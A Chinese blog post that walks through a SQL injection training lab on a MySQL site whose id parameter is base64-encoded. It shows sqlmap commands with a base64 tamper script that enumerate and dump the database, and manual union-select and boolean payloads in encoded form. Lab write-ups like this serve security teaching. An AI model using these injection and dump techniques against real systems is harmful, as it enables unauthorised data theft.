墨者mysql注入_SQL注入实战-MySQL-墨者学院

本文介绍了两种SQL注入方法来渗透MySQL数据库。第一种使用SQLMap自动化工具,通过tamper插件base64encode.py获取数据库、表和字段信息。第二种方法是手工注入,通过对URL中的base64编码进行解码和SQL语句加密,验证注入漏洞并利用order by进行数据猜测。
摘要由CSDN通过智能技术生成

SQL注入实战-MySQL

今天我将用两种方法来讲解,第一种,SQLMap自动化跑数据库,第二种,利用火狐的hackbar来手工注入。

【第一种】

1.先看这个url:http://219.153.49.228:45709/show.php?id=MQo=,一般来说都是id=一个数字,这个MQo=是属于base64加密,加密规律、规则请参考百度百科。

2.用SQLMap的tamper插件,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –dbs –level 3(SQLMap下有tamper这个文件夹,下面有base64encode.py这个插件),可以看到爆出来两个数据库。

a307b0f5198f2e70636dff7e17fb8c92.png

2.继续爆表,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –table -D test –level 3,爆出来data这个表

a04980ad4caa89c8f1a7bf035aa71b51.png

3.继续爆字段,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –columns -T data -D test –level 3,爆出来main这个字段

0cac0018bc3f8fcc001421a6602ac50d.png

4.开始脱裤,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py -D test -T data -C main,thekey,title –dump –level 3,脱裤成功,而且在下面这两个文件中都有保存。

23447af0ce4d7cb91fe4a9e7bf6e3434.png

**——————————————————————————————————————————

分割线

——————————————————————————————————————————

**

【第二种】

1.手工注入,前面我们已经说过这个url:http://219.153.49.228:45709/show.php?id=MQo=是经过base64加密的,解密之后我们知道这个MQo=其实是1,这个就需要我们每次注入的时候将正常的SQL语句转换成base64之后再注入,现在我将进行注入,上面的图片是正常一般操作,下面的图片是base64加密之后的,我们要执行的就是下面的加密过了的。

27753a5f55fa8c3cdc396f69333b653a.png

25feca53f1b034574fa511ba0f9e9f09.png

2.分别测试and 1=1和and1=2,发现and 1=2报错,则说明此处存在SQL注入漏洞

3.用order by 2(数字随便改)来进行猜测,order by可以参考:

4.然后用

[http://219.153.49.228:47049/show.php?id=-1%20union%20select%20database%28%29,version%28%29]

加密后的为

[http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksdmVyc2lvbigp]

来进行注入

45df0d12b4877d45accc52a019f285cb.png

cce954e03e8a4f42ee123ad453dd0eb2.png

发现这里面有test数据库,继续爆表名

注:这里用-1是为了让它报错的。

还可以用下这句:and exists(select schema_name from information_schema.schemata) 能够正常显示内容,即管理员并没有屏蔽information_schema数据库内容,可以通过此数据库来进行下一步测试

10b65d5a50424d329e3f517607e00091.png

3c50ff32edb017a20eef6f5226a9eccb.png

8.完成。

参考:墨者学院

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值